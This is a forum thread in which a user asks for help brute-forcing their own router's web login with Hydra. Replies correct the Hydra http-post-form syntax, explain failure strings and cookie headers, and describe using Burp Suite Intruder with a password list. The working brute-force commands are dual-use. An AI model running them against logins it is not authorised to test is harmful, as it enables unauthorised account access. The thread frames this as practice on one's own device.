Jump to content

Recommended Posts

Posted

Hello,

I'm trying to hack into my router (Not doing anything nefarious)
Can I get some help with the '/login.cgi' part?

hydra 192.168.1.254 http-form-post "/login.cgi:sessionKey=177691457&inputUserName=^USER^&inputPassword=^PASS^:err" -L admin -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt

I'm guessing that in the current state even if hydra was to get the password correct it would still respond in "msg=err". Because I need to have a proper session key.
Also any idea what "nothankyou=1" is? Do I need to have that in the command?
Is there like a cookie file I have to use to generate session keys?

Also ":err" is like a . "If response is not 'err' then that was a correct password" Is this piece correct? The browser returns "http://192.168.1.254/index.html?msg=err"
Should it be ":msg=err"?

Thanks for your help.

 

POST http://192.168.1.254:80/login.cgi HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.254/
Cookie: Telus=T1200H-31.128L.07
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-length: 68

sessionKey=1286954970&inputUserName=as&inputPassword=fd&nothankyou=1

 

Posted

For brute forcing web applications I recommend using Burp Suite.  You would simply capture an attempt to login with any password (like the one you've already shared), then right click on the POST and send it to the Intruder tab.  Highlight the password field and then import your password list as the payload injections.

Since this is your Router I'm assuming you already know the password and are simply trying this as an exercise.  You could log in with the correct password and use Burp to tell you what a correct response looks like.  Then you can tailor your Intruder advanced options to check specifically for the correct response.

Hope that helps.

Posted (edited)

Hydra works fine, and I use it all the time, but look at your syntax, i think you have http-form-post wrong, should try "http-post-form" like so:

 

hydra -l admin -P pass.txt 192.168.1.254 http-post-form "/login.cgi:sessionKey=177691457&inputUserName=^USER^&inputPassword=^PASS^:F=err:" -o hydra-http-post-attack.txt

If your router uses https, change it to "https-post-form"

 

Also, if you are specifying the user, use lowercase l not capital. capital L is for wordlist of user names. You can in most cases omit the session key, but if it uses specific hard coded cookies you should try to pass the cookie using the :H cookie='cookieinfo':

 

Edited by digip
Posted
On 10/5/2016 at 9:17 AM, pentestgeek said:

For brute forcing web applications I recommend using Burp Suite.  You would simply capture an attempt to login with any password (like the one you've already shared), then right click on the POST and send it to the Intruder tab.  Highlight the password field and then import your password list as the payload injections.

Since this is your Router I'm assuming you already know the password and are simply trying this as an exercise.  You could log in with the correct password and use Burp to tell you what a correct response looks like.  Then you can tailor your Intruder advanced options to check specifically for the correct response.

Hope that helps.

Again since this is in fact your router as you say and you know the password you can find out if sessionkey is required or not.  Simply replay the POST with only the "inputUserName" and "inputPassword" parameters and see if you get a successful response.

Posted
11 hours ago, kdodge said:

is thc open source?

hydra is the tool name in Kali really, although thc-hydra is it's full name, you invoke it with hydra.

It is open source.

Home page: https://www.thc.org/thc-hydra/

Git page: https://github.com/vanhauser-thc/thc-hydra

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...